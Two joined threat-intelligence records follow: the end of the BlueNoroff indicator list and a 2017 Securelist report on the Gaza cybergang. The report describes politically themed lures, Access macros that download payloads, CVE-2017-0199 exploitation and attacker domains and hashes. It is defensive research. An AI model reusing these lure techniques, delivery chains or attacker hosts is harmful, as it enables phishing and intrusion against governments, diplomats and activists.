781a20f27b72c1c901164ce1d025f641 MSAssist.lnk
483e3e0b1dceb4a5a13de65d3556c3fe MSAssist.lnk

**Malicious documents**
00a63a302dcaffc9f28826e9dba30e03 Abies VC Presentation.docx
ee9dda6bbbb1138263873dbef36a4d42 Abies VC Presentation.docx
0f1c81c2023eae0fc092ce9f58213bcf Abies VC Presentation.docx
491e0d776f01f102d36155a46f1a8e3c Ant Capital Presentation (Azure Protected).docx
c33ce08ebcc6e508bb3a17e0fa7b08f8 Global Brain Pitch Deck.docx
b1911ef720b17aeed69ec41c8e94cc1e
340fb219872ce3c0d3acf924f4f9e598 Venture Labo Investment Pitch Deck.docx
380e9e78dc5bc91fb6cdd8b4a875f20a
eb18ac97dba79ea48c185fb2826467fe
2a9ff6d80cdd4aeed1c48a1ccdc525dd Abies VC Presentation.docx
ecf75bec770edcd89a3c16d3c4edde1a Abies VC Presentation (1).docx
6c4943f4c28a07ee8cae41dad16d72b3 Abies VC Presentation.docx
f76e2e6bfbee77ae36049880d7c227f7 Abies VC Presentation.docx
7aec3d1b24ed0946ab740924be5834fa Abies VC Presentation.docx
47e325e3467bfa80055b7c0eebb11212 Abies VC Presentation.docx
1e0d96c551ca31a4055491edc17ce2dd Abies VC Presentation.docx
bcf97660ce2b09cbffb454aa5436c9a0 Digital Asset Investment Stategy 2020 (ISO 27001).docx
13ff15ac54a297796e558bb96feaacfd Abies VC Presentation(ISO 27001).docx
cace67b3ea1ce95298933e38311f6d0b Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx
645adf057b55ef731e624ab435a41757 OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx
bde4747408ce3cfdfe8238a133ebcac9 Circle Business Introduction(ISO 27001).docx
421b1e1ab9951d5b8eeda5b041cb0657 Berkshire Hathaway HomeServices Custody - Mutual NDA.docx
d2f08e227cd528ad8b26e9bbe285ae3c Union Square Ventures Partnership - Mutual NDA Form.docx
04deb35316ebe1789da042c8876c0622 Chiliz Partnership - Mutual NDA Form.docx
af4eefa8cddc1e412fe91ad33199bd71 FasterCapital Mutual NDA Form.docx
34239a3607d8b5b8ddd6797855f2e827 FasterCapital Introduction 2020 Oct.docx
389172d2794d789727b9f7d01ec27f75 Lundbergs NDA Mutual Form.docx
f40e7998a84495648b0338bc016b9417 Union Square Ventures Partnership - Mutual NDA Form.docx
c8c2a9c50ff848342b0885292d5a8cd4 VIRUS.docx
adf9dc317272dc3724895cb07631c361 Non-Disclosure-Agreement-NDA(ISO 27001).docx
158d84c90a79edb97ec5b840d86217c7 Venture Labo Investment Pitch Deck.docx
e26725f34ebcc7fa9976dd07bfbbfba3 Global Brain Pitch Deck.docx
a435acb5bac92b855d1799a685507522
9969b67ef643bed20a38346dcd69bec4
a6446bfea82b69169b4026222ca253b2
bdf1643c3a10a25d3aba2c4c608ec5d5
b4b695c8e6fea95db5843a43644f88b0
d8561c74ad9624d7c35c0fb15d3ca8fe
f9195b14ed20b30b7c239d50e6418151
3dd638551b03a36d13428696dcada5d8
f26eaa212c503aaba6e5015cb8ef44b5 Venture Labo Investment Pitch Deck.docx
793de76de6d4015ebdd5e552ac5b2f90 Pantera Capital Investment Agreement(Protected).docx
709ec9fbbc3c37ccd39758527c332b84 Pantera Capital Investment Agreement(Protected).docx
89099235aad37a29b7acedc96fda0037 Venture Labo Investment Pitch Deck.docx
358791e1abd64f490c865643a3fbb93d Z Venture Capital Presentation(Protected).docx
cea54a904434c66f217fbadc571e1507 Z Venture Capital Presentation(Protected).docx
9be0075b9344590b3cabf61c194db180 Rapid Change of Stablecoin (Protected).docx
98e30453bbf1c9c9f48368f9bbe69edd Z Venture Capital Presentation(Protected).docx
9ad7b21603ecce5ee744ba8aa387fb6c Pantera Capital Investment Agreement(Protected).docx.123.docx.123

**Injected remote template**
3dd638551b03a36d13428696dcada5d8
2da244dc9bbdbf2013b7fbc2a74073a2
f3157dc297cb802c8ae2f07702903bfa

**Visual Basic Script**
ce09cdb7979fb9099f46dd33036b9001 xivwtjab.vbs
f7f4aa55a2e4f38a6a3ea5a108baedf5 vwnozphn.vbs

**Powershell**
ae52b28b360428829c4fcdc14e839f19 usoclient.ps1

**Powershell agent (VBS-wrapped)**
73572519159b0c27a18dbbaf25ef1cc0 guide.vbs
8ae6aa90b5f648b3911430f14c92440b %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs
ae12a668dd9f254c42fcd803c7645ed1 1.vbs
589f1bb4da89cfd4a2f7f3489aa426a9 %APPDATA%\microsoft\windows\start menu\programs\startup\guide.vbs

**Backdoor**
1d0fc2f1a6eb2b2bfa166a613ca871f0
db91826cb9f2ad6edfed8d6bab5bef1f users.dll, wmc.dll
9c592a22acdfb750c440fda31da4996c

**Keylogger**
f29be5c7e602e529339fda35ff91bd39

**Screencapture malware**
f194e074e7d73c544eebb70e2e2785a1

**Injector**
ec2b51dc1dc99165a0eb46b73c317e25 cssvc.dll
d8e51f1b9f78785ed7449145b705b2e4 cfssvc.dll
dd2d50d2f088ba65a3751e555e0dea71 bfcsvc.dll
f5317f1c0a10a80931378d68be9a4baa lssc.dll
8727a967bbb5ebd99789f7414d147c31 sst.dll
cab281b38a57524902afcb1c9c8aa5ba bnt.dll
6a2cbaea7db300925d25d9decf461d95 lmsvc.dll
33a60ea8859307d3fd1a1fe884e37d2d
1993ebb00cb670c6e2ca9b5f6c6375c4 sessc.dll
1fb48113d015466a272e4b70c3109e06 wssc.dll
33ae39569f0051d8dc153d7b4e814a67
525345989e10b64cd4d0e144eb48171f
724d11c2cae561225e7ed31d7517dd40 lsasvc.dll
56df737f3028203db8d51ed1263160ad ocss.dll
a160b36426ce77bccdd32d117eeb879b csscv.dll
8fa484d35e60b93a4128dc5de45ec0df wmmc.dll
5cc93ccc91b2849df55d89b360fbae58
630ba28be4f55ea67225a3760f9e8c1f

**Persistence Backdoor #1**
2934a7a0dfaf2ebc81b1f089277129c4 Default.rdp
6c97c64052dfdc457b001f84b8657435 Default.rdp
bdc354506d6c018b52cb92a9d91f5f7c Default.rdp
737478dbd1f66c9edb2d6c149432be26 Default.rdp
5912e271b0da85ae3327d66deabf03ed Default.rdp
d209c3da192c49cecb5a7b3d0f7154ac Default.rdp
8d8f3a0d186b275e51589a694e09e884 Default.rdp
7ccf3ddbdb175fcfece9c4423acf07b6
0a9b8ca2988208b876b74641c07f631e Default.rdp

**Persistence Backdoor #2**
9b30baa7873d86f985657c3e324ac431 vsat.dll
ae79ea7dfa81e95015bef839c2327108 ssdp.dll
ca9b98f17b9e24ca3f802c04eb508103
849dd9e09cc2434ee7dbdbf9e1c408b2
804523ecb9f7809fc2377d03b47dba22
2b7e434e52ff7480ae06ba901f8efbfd
7129020312b85d5b1e760fc57b567d95
ea9d8b81c9f85fd142639997187b447e
e80f9d2fa735d7ab3bd9e954c4fcb6d0
e2ddf13340ba79b2635618e5675eea23
00a145e8f67a92b01ce4d85a0ed6bd77
73aed6bcf90f936f3fbcb389a133d7c8
ff28ec14ec926b9892c61b9bf154a910
97e5c0fe8089da97665a22975e2c86de
f60d7f620dc925c4e786bcf46856f4c8
4fbff7f0f62b26963b56c0fc23486891
4bb579d59830579be9ead9f74a55001e
aafc80ff2afc71b0d5abd6c8d2809e65
9850b24f8d70ad957f328961170e2d40
58495a2083065b36040eea288a9d5e17
f1cfd14b030e6b5d75e777ace530dad9
1fb25f72e4eb26b0df154de28dbff74c
1b1acc7f27717905e7094f338f81db9f
3776d4a24213972b54b9ed3360ac7883
c93f3bb4f7b19f5eb6f736f2659c4dae
9084620e0219c035d60d395be1bf4cae
2e38f37a23d9f00a02098dd302fc14e2

**Domains**
abiesvc[.]com
abiesvc[.]info
abiesvc.jp[.]net
atom.publicvm[.]com
att.gdrvupload[.]xyz
authenticate.azure-drive[.]com
azureprotect[.]xyz
backup.163qiye[.]top
beenos[.]biz
bhomes[.]cc
bitcoinnews.mefound[.]com
bitflyer[.]team
blog.cloudsecure[.]space
buidihub[.]com
chemistryworld[.]us
circlecapital[.]us
client.googleapis[.]online
cloud.azure-service[.]com
cloud.globalbrains[.]co
cloud.jumpshare[.]vip
cloud.venturelabo[.]co
cloudshare.jumpshare[.]vip
coin-squad[.]co
coinbig[.]dev
coinbigex[.]com
deepmind[.]fund
dekryptcap[.]digital
dllhost[.]xyz:5600
doc.venturelabo[.]co
doc.youbicapital[.]cc
doconline[.]top
docs.azureword[.]com
docs.coinbigex[.]com
docs.gdriveshare[.]top
docs.goglesheet[.]com
docs.securedigitalmarkets[.]co
docstream[.]online
document.antcapital[.]us
document.bhomes[.]cc
document.fastercapital[.]cc
document.kraken-dev[.]com
document.lundbergs[.]cc
document.skandiafastigheter[.]cc
documentprotect[.]live
documentprotect[.]pro
documents.antcapital[.]us
docuserver[.]xyz
domainhost.dynamic-dns[.]net
download.azure-safe[.]com
download.azure-service[.]com
download.gdriveupload[.]site
drives.googldrive[.]xyz
drives.googlecloud[.]live
driveshare.googldrive[.]xyz
dronefund[.]icu
drw[.]capital
eii[.]world
etherscan.mrslove[.]com
faq78.faqserv[.]com
fastdown[.]site
fastercapital[.]cc
file.venturelabo[.]co
filestream[.]download
foundico.mefound[.]com
galaxydigital[.]cc
galaxydigital[.]cloud
googledrive[.]download
googledrive[.]email
googledrive[.]online
googledrive.publicvm[.]com
googleexplore[.]net
googleservice[.]icu
googleservice[.]xyz
gsheet.gdocsdown[.]com
hiccup[.]shop
innoenergy[.]info
isosecurity[.]xyz
jack710[.]club
jumpshare[.]vip
kraken-dev[.]com
ledgerservice.itsaol[.]com
lemniscap[.]cc
lundbergs[.]cc
mail.gdriveupload[.]info
mail.gmaildrive[.]site
mail.googleupload[.]info
mclland[.]com
microstratgey[.]com
miss.outletalertsdaily[.]com
msoffice.qooqle[.]download
note.onedocshare[.]com
onlinedocpage[.]org
page.googledocpage[.]com
product.onlinedoc[.]dev
protect.antcapital[.]us
protect.azure-drive[.]com
protect.venturelabo[.]co
protectoffice[.]club
pvset.itsaol[.]com
qooqle[.]download
qoqle[.]online
regcnlab[.]com
reit[.]live
securedigitalmarkets[.]ca
share.bloomcloud[.]org
share.devprocloud[.]com
share.docuserver[.]xyz
share.stablemarket[.]org
sharedocs[.]xyz
signverydn.sharebusiness[.]xyz
sinovationventures[.]co
skandiafastigheter[.]cc
slot0.regcnlab[.]com
svr04.faqserv[.]com
tokenhub.mefound[.]com
tokentrack.mrbasic[.]com
twosigma.publicvm[.]com
up.digifincx[.]com
upcraft[.]io
updatepool[.]online
upload.gdrives[.]best
venturelabo[.]co
verify.googleauth[.]pro
word.azureword[.]com
www.googledocpage[.]com
www.googlesheetpage[.]org
www.onlinedocpage[.]org
youbicapital[.]cc

**C2 address used by backdoor**
118.70.116[.]154:8080
163.25.24[.]44
45.238.25[.]2
devstar.dnsrd[.]com
fxbet.linkpc[.]net
lservs.linkpc[.]net
mmsreceive.linkpc[.]net
msservices.hxxps443[.]org
onlineshoping.publicvm[.]com
palconshop.linkpc[.]net
pokersonic.publicvm[.]com
press.linkpc[.]net
rubbishshop.linkpc[.]net
rubbishshop.publicvm[.]com
socins.publicvm[.]com
vpsfree.linkpc[.]net

_Update: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate service/application._

(Record metadata: "The BlueNoroff cryptocurrency hunt is still on", Securelist blog, published and modified 2022-01-13T09:00:23, CVE list: CVE-2017-0199, id SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE, https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/)

(Next record, last seen 2017-10-30T17:33:15.)

## 1. Summary information

The Gaza cybergang is an Arabic-language, politically-motivated cybercriminal group, operating since 2012 and actively targeting the MENA (Middle East North Africa) region. The Gaza cybergang's attacks have never slowed down and its typical targets include government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.

One of the interesting new facts, uncovered in mid-2017, is its discovery inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year.

Another interesting finding is the use of the recently discovered CVE-2017-0199 vulnerability, and of Microsoft Access files into which the download scripts were embedded to reduce the likelihood of their detection. Traces of mobile malware that started to appear from late April 2017 are also being investigated.

Recent targets for the group seem to be varied in nature; the attackers do not appear to be choosing targets selectively, but rather seeking different kinds of MENA intelligence.

Some of the interesting new updates about the Gaza cybergang:

 * Gaza cybergang attackers have continued their interest in government entities in MENA
 * New targets identified include oil and gas in MENA
 * New tools and techniques include:
   * Abuse of the CVE-2017-0199 vulnerability
   * Usage of macros inside Microsoft Access files, enabling lower detection rates
   * Possible Android mobile malware being used by attackers

**Previous published research:**
<https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/>

**Kaspersky Lab products and services successfully detect and block Gaza cybergang attacks, detection names below:**

 * HEUR:Exploit.MSOffice.Generic
 * HEUR:Trojan.Win32.Cometer.gen
 * HEUR:Trojan.Win32.Generic
 * Trojan-Downloader.Win32.Downeks
 * Trojan-Spy.MSIL.Downeks
 * Win32.Bublik
 * Win32.Agentb

More information about Gaza cybergang is available to
customers of the Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

## 2. Technical details

Previously, Gaza cybergang attacks were surprisingly successful in using simple and common tools to achieve their goals. They relied on a variety of Remote Access Trojans (RATs) to perform their activities, including Downeks, Quasar, Cobaltstrike…

As recently as June 2017, however, the attackers started using the CVE-2017-0199 vulnerability, which enables direct code execution from a Microsoft Office document on unpatched victim systems (a Cobaltstrike payload in this case). Another finding is a possible Android Trojan that the attackers positioned on one of their command servers in April 2017.

In most cases, malware is sent by email as a compressed attachment or as download links. Starting from March 2017, we have observed downloaders or Microsoft Office documents with embedded macros being sent to victims. When opened, the downloader contacts a URL or IP address to retrieve the actual payload. Once successfully executed, the malware grants full access to the attackers, providing them with the ability to collect files, keystrokes and screenshots from victims' devices. If the initially downloaded malware is detected by the victim, the downloader attempts to retrieve other malware files to the victim's device, in the hope that one of those files will work.

The full list of indicators of compromise (IOCs) can be found in Appendix I. The list of the most interesting lure content, malware files and related droppers, and command servers can be found in Appendix II.

## 3. Summary of recent campaigns

Below can be found the list of recent findings related to Gaza cybergang operations:

| **Command and control server** | **Hash** | **First seen** | **File name/Social engineering lure** |
|---|---|---|---|
| **upgrade.newshelpyou[.]com** | 552796e71f7ff304f91b39f5da46499b | 25-07-2017 | nvStView.exe |
| | 6fba58b9f9496cc52e78379de9f7f24e | 23-03-2017 | صور خاصة.exe (Translation: Special photos) |
| | eb521caebcf03df561443194c37911a5 | 03-04-2017 | صور خاصة.exe (Translation: Special photos) |
| **moreoffer[.]life** | 66f144be4d4ef9c83bea528a4cd3baf3 | 27-05-2017 | تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe (Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency) |
| | 3ff60c100b67697163291690e0c2c2b7 | 11-05-2017 | MOM.InstallProxy.exe |
| | b7390bc8c8a9a71a69ce4cc0c928153b | 05-04-2017 | تعرف على المنقبة التي أساءت للسعودية (Translation: Learn about the woman wearing niqab which offended Saudi) |
| | f43188accfb6923d62fe265d6d9c0940 | 21-03-2017 | Gcc-Ksa-uae.exe |
| | 056d83c1c1b5f905d18b3c5d58ff5342 | 16-03-2017 | مراسلة بخصوص اجتماع رؤساء البعثات.exe (Translation: Correspondence regarding the meeting of Heads of Missions) |
| **138.68.242[.]68** | 87a67371770fda4c2650564cbb00934d | 20-06-2017 | hamas.doc; نقاط اتفاق حماس وتيار فتح الاصلاحي.doc (Translation: the points of agreement between Hamas and the reformist Fateh movement); محضر اجتماع مركزية فتح الليلة.doc (Translation: minutes of tonight's meeting); سلفة أم راتب للموظفين يوم الثلاثاء المقبل؟.doc (Translation: An advance on salary or full salary for employees next Tuesday?) |
| **lol.mynetav[.]org** | 4f3b1a2088e473c7d2373849deb4536f | 20-06-2017 | Notepad.exe; attachment.scr; https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU |
| **signup.updatesforme[.]club** | 7d3426d8eb70e4486e803afb3eeac14f | 04-05-2017 | Palestinian Retirement Authority Ramallah.exe |
| | 0ee4757ab9040a95e035a667457e4bc6 | 27-04-2017 | 27-4-2017 Fateh Gaza plo.exe |
| **ping.topsite[.]life** | b68fcf8feb35a00362758fc0f92f7c2e | 19-03-2017 | Downloaded by macro in MDB files: http://download.data-server.cloudns[.]club/indexer.exe |
| | 7bef124131ffc2ef3db349b980e52847 | 13-03-2017 | الأخ اسماعيل هنية -نائب رئيس المكتب السياسي .exe (Translation: Brother Ismail Haniyeh - Deputy Head of the Political Bureau) |
| | d87c872869023911494305ef4acbd966 | 19-03-2017 | Downloaded by macro in MDB files: http://download.data-server.cloudns[.]club/wordindexer.exe |
| | a3de096598e3c9c8f3ab194edc4caa76 | 12-04-2017 | viewimages.exe |
| | c078743eac33df15af2d9a4f24159500 | 28-03-2017 | viewimages.exe |
| | 70d03e34cadb0f1e1bc6f4bf8486e4e8 | 30-03-2017 | download-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe |
| | 67f48fd24bae3e63b29edccc524f4096 | 17-04-2017 | http://alasra-paper.duckdns[.]org/send/رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.rar (Translation: Message from President Abu Mazen to Hamas in Gaza Strip) |
| | 7b536c348a21c309605fa2cd2860a41d | 17-04-2017 | http://alasra-paper.duckdns[.]org/send/ورقة_الاسرى_المقدمة_لفك_الاضراب .rar (Translation: captives paper submitted to stop the strike) |
| **alasra-paper.duckdns[.]org** | Mobile malware N/A | 23-04-2017 | Possible Android malware. http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse.com/Dont-Starve-Pocket-Edition-1.04_ApkHouse.com.apk |
| **hamas-wathaq.duckdns[.]org** | cf9d89061917e9f48481db80e674f0e9 | 16-04-2017 | وثائق تنشر لأول مره عن حكم حماس لقطاع غزه .exe (Translation: Documents published for the first time on Hamas ruling of Gaza Strip) |
| **manual.newphoneapp[.]com** | 86a89693a273d6962825cf1846c3b6ce | 02-02-2017 | SQLiteDatabaseBrowserPortable.exe |
| | 3f67231f30fa742138e713085e1279a6 | 02-02-2017 | SQLiteDatabaseBrowserPortable.exe |

The above listed files are further described in Appendix 1.

## 4. New findings

Gaza Cybergang attackers have been continuously evolving their skills on different levels, using new methods and techniques to deliver malware, in addition to adapting social engineering decoys to regional political and humanitarian incidents.

In mid-2017, the attackers were discovered inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year. The malware files that were found had been reported previously: <https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/>

While traces of Android mobile malware have been spotted, attackers have continuously used the Downeks downloader and the Quasar or Cobaltstrike RATs to target Windows devices, enabling them to obtain remote access, spying and data exfiltration abilities. This is now achieved more efficiently using the CVE-2017-0199 vulnerability, which enables direct code execution from a Microsoft Office document on unpatched victim Windows systems. The use of Microsoft Access database files has also enabled the attackers to maintain low levels of detection, as it is an uncommon method of delivering malware.

These developments have helped the attackers continue their operations, targeting a variety of victims and organizations, sometimes even bypassing defences and persisting for prolonged periods.

### 4.1. The extended use of humanitarian and political causes in social engineering attacks

Attackers have continuously targeted victims and organizations in government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.

The Gaza cybergang relies increasingly on advanced and up-to-date social engineering techniques with political and humanitarian aspects that directly reflect regional incidents.
Here is a short list of incidents that were each used multiple times:

 * Palestinian Government not paying salaries to Gaza employees
 * Palestinian prisoners' hunger strike in Israeli jails
 * The political crisis in Qatar

Recent targets for the group seem to be varied in nature; the attackers do not appear to be choosing targets selectively, but rather seeking any type of intelligence.

#### 4.1.1. Example lure

MD5: 66f144be4d4ef9c83bea528a4cd3baf3

تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe

(Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency)

Attackers have recently used political events related to the Qatar political crisis in the Middle East in targeting their victims.

Original filename: Qatar-27-5-2017.rar

Extracts to 66f144be4d4ef9c83bea528a4cd3baf3

تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe

SHA256: 7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04

**C2: moreoffer[.]life**

**First seen: 27 May 2017**

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-1.png>)

Translation: new details on the hack of the Qatar News Agency

### 4.2. The use of Microsoft Access files with macros

Microsoft Access files with macros are another new development by the attacker group. MS Access database-embedded macros are proving to have very low detection rates.

MD5: 6d6f34f7cfcb64e44d67638a2f33d619

Filename: GAZA2017.mdb

C1: http://download.data-server.cloudns[.]club/GAZA2017.mdb

**Downloads and executes:**

 * data-server.cloudns[.]club/wordindexer.exe
 * data-server.cloudns[.]club/indexer.exe

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-2.png>)

Translation: database of employees not receiving salaries, click "enable content" to see data

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-3.png>)

Decrypted code

### 4.3. Exploitation of the CVE-2017-0199 vulnerability

MD5: 87a67371770fda4c2650564cbb00934d

First seen: 20-06-2017

Filenames:

 * hamas.doc
 * نقاط اتفاق حماس وتيار فتح الاصلاحي.doc (Translation: the points of agreement between Hamas and the reformist Fateh movement)
 * محضر اجتماع مركزية فتح الليلة.doc (Translation: minutes of tonight's Fateh meeting)
 * سلفة أم راتب للموظفين يوم الثلاثاء المقبل؟.doc (Translation: An advance on salary or full salary for employees next Tuesday?)

The attacks are a typical exploitation of CVE-2017-0199, starting with an email that distributes a malicious RTF document. The vulnerability is in the code that handles OLE2Link embedded objects, which allows Microsoft Office Word to run remote files, downloaded in this case from 138.68.242[.]68. The downloaded payload is Cobaltstrike, which then connects to lol.mynetav[.]org to receive commands from the attackers. Additional details on the Gaza cybergang's use of CVE-2017-0199 with Cobaltstrike can be found here: <http://bobao.360.cn/learning/detail/4193.html>

### 4.4. Possible Android mobile malware

Traces of APK files have been seen on one of the attackers' command centers, starting from 23-04-2017.

URL: http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse[.]com/Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-4.png>)

The file name (Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk) is an Android application file masquerading as a popular game. We believe the Android Trojan could be related to a previously investigated Android Trojan around the Gaza strip: <https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/>

## 5. Conclusion

The Gaza Cybergang has demonstrated a large number of attacks and advanced social engineering, in addition to active development of attacks, infrastructure and the utilization of new methods and techniques. Attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services.
Kaspersky Lab expects these types of attacks to intensify in the near term, both in terms of quality and quantity.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

 * Educate staff to be able to distinguish spear-phishing emails or a phishing link from legitimate emails and links
 * Use a proven corporate-grade security solution in combination with anti-targeted-attack solutions capable of catching attacks by analyzing network anomalies
 * Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules
 * Make sure enterprise-grade patch management processes are well established and executed.

More information about Gaza cybergang is available to customers of the Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

## 6. Appendix 1: malware files description and decoys

In the following, we list the description of malware files found from March 2017, including decoys used, dates the files were first seen, parent files…

### 6.1. b7390bc8c8a9a71a69ce4cc0c928153b

Parent file: 970e6188561d6c5811a8f99075888d5f 5-4-2017.zip

C2: moreoffer[.]life

First seen: 5 April 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-5.png>)

Translation: Get to know the women wearing niqab and talking bad about the kingdom

### 6.2. f43188accfb6923d62fe265d6d9c0940

Filename: Gcc-Ksa-uae.exe

C2: moreoffer[.]life (185.11.146[.]68)

First seen: 21 March 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-6.png>)

Translation: the permanent delegation of the cooperation council for the Arab states of the Gulf (GCC) to the United Nations and other international organizations, Geneva

### 6.3. 056d83c1c1b5f905d18b3c5d58ff5342

Filename: مراسلة بخصوص اجتماع رؤساء البعثات.exe

Translation: Correspondence regarding the meeting of Heads of Missions (Saudi related)

Parent file: fb549e0c2fffd390ee7c4538ff30ac3e

C2: moreoffer[.]life

First seen: 16 March 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-7.png>)

Translation: The fourth foreign meeting of the Kingdom's heads of missions under the title "message of the ambassador".

### 6.4. 0ee4757ab9040a95e035a667457e4bc6

Filename: 27-4-2017 Fateh Gaza plo.exe

C2: signup.updatesforme[.]club

First seen: 27 April 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-8.png>)

Translation: Clarification report

### 6.5. 7bef124131ffc2ef3db349b980e52847

Filename: الأخ اسماعيل هنية -نائب رئيس المكتب السياسي .exe

(Translation: Brother Ismail Haniyah - Deputy Head of the Political Bureau)

C2: ping.topsite[.]life

First seen: 14 March 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-9.png>)

Translation: Brother Ismail Haniyah - Deputy Head of the Political Bureau

### 6.6. 70d03e34cadb0f1e1bc6f4bf8486e4e8

download-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe

C1: download-file.duckdns[.]org

C2: ping.topsite[.]life

First seen: 30 March 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-10.png>)

Translation: methods to apply the Palestinian national agreement pact.

### 6.7. 67f48fd24bae3e63b29edccc524f4096

C1: http://alasra-paper.duckdns[.]org/send/رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.rar

C2: ping.topsite[.]life

RAR extracts to: 5d74487ea96301a933209de3d145105d

رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.exe

First seen: 17 April 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-11.png>)

Translation: a severely threatening message from Abbas's delegation to Hamas

### 6.8. 7b536c348a21c309605fa2cd2860a41d

C1: http://alasra-paper.duckdns[.]org/send/ورقة_الاسرى_المقدمة_لفك_الاضراب .rar

Extracts to: d973135041fd26afea926e51ce141198, named (RTLO technique):

ورقة الاسرى المقدمة لفك الاضراب .exe

Translation: captives paper submitted to stop the strike

C2: ping.topsite[.]life

First seen: 17 April 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-12.png>)

Translation: The primary demands of the captives in the strike of freedom and dignity

### 6.9. cf9d89061917e9f48481db80e674f0e9

وثائق تنشر لأول مره عن حكم حماس لقطاع غزه .exe c11516cd8c797f0182d63cdf343d08ed

Translation: Documents published for the first time on Hamas ruling of Gaza Strip

C1: http://hamas-wathaq.duckdns[.]org/send/وثائق_تنشر_لأول_مره_عن_حكم_حماس_لقطاع_غزه.rar

C2: ping.topsite[.]life

First seen: 16 April 2017

[Screenshot](<https://securelist.com/files/2017/10/171018-gaza-cybergang-13.png>)

Translation: Scandals and facts published for the first time on Hamas's ruling of Gaza Strip

## 7. Appendix 2: List of IOCs

### 7.1. Malicious domain names

moreoffer[.]life
signup.updatesforme[.]club
ping.topsite[.]life
alasra-paper.duckdns[.]org
hamas-wathaq.duckdns[.]org
download.data-server.cloudns[.]club
upgrade.newshelpyou[.]com
manual.newphoneapp[.]com
hnoor.newphoneapp[.]com
lol.mynetav[.]org

### 7.2. IP addresses

138.68.242[.]68
185.86.149[.]168
185.11.146[.]68
45.32.84[.]66
45.32.71[.]95
107.161.27[.]158
46.246.87[.]74

### 7.3. Hashes

**MD5**

87a67371770fda4c2650564cbb00934d
4f3b1a2088e473c7d2373849deb4536f
c078743eac33df15af2d9a4f24159500
3ff60c100b67697163291690e0c2c2b7
a3de096598e3c9c8f3ab194edc4caa76
7d3426d8eb70e4486e803afb3eeac14f
3f67231f30fa742138e713085e1279a6
552796e71f7ff304f91b39f5da46499b
6fba58b9f9496cc52e78379de9f7f24e
eb521caebcf03df561443194c37911a5
b68fcf8feb35a00362758fc0f92f7c2e
d87c872869023911494305ef4acbd966
66f144be4d4ef9c83bea528a4cd3baf3
b7390bc8c8a9a71a69ce4cc0c928153b
f43188accfb6923d62fe265d6d9c0940
056d83c1c1b5f905d18b3c5d58ff5342
0ee4757ab9040a95e035a667457e4bc6
7bef124131ffc2ef3db349b980e52847
70d03e34cadb0f1e1bc6f4bf8486e4e8
67f48fd24bae3e63b29edccc524f4096
7b536c348a21c309605fa2cd2860a41d
cf9d89061917e9f48481db80e674f0e9
6d6f34f7cfcb64e44d67638a2f33d619
86a89693a273d6962825cf1846c3b6ce
5472d0554a0188c0ecebd065eddb9485

**SHA256**

0b6fe466a3ba36895208e754b155a193780c79ba8b5c1c9f02c4f7e479116e5f
0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a
0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa
1f2b128d26a58a572ea1faee2c4d9dc759eb8add16d9ad0547b3f0305fea212a
205f32cc717c2d82baeff9ff5aa9fc31967b6ae5cde22fafe14aec9c9ec62acc
284af7a2fafdbff3bbc28b9075f469d2352758b62d182b0e056d29ee74688126
344dc6ece5a6dacce9050a65305d4b34865756051a6f414477b6fa381e1c1b63
42e4298f5162aba825309673187e27121e3f918238e81f3a6e021c03f3455154
44a8d0561a9cc6e24d6935ff4c35b7b7db50c4001eb01c48ea1cfd13253bc694
57a12f20c6bbd69b93e76d6d5a31d720046b498aa880b95b85a4f3fda28aac4f
